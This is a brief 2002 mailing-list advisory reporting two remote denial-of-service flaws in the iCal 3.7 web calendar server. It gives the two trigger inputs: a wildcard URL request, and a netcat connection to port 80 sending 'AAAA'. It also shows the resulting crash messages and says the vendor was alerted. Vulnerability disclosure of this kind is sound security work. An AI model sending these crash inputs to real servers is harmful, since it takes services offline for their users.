ical 3.7 remote dos

[securma massine <securma () caramail com>]

hi
iCal (http://www.brownbearsw.com)is a web-based calendar
that can be used to show meetings,
 events, or other schedules. calendars can be viewed,
edited,
 and administered totally through the web. iCal is build
for
 thin-clients, so access calendar without any plug-ins
 or java interpreters.
I found two vulnerabilities has ical 3.7
1-http//target/*
error message:Unable to write to D:\program files\iCl 3.7
Web Calender\*.cal (the server is down)

 2-nc target 80
 AAAA
[ enter ]
error message:Access violation at address 00403d8b in
module'ICAL.EXE' Read of address 0161c1af

ical is alerted the 26/12/2002


securma massine

_________________________________________________________
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors coût du SMS)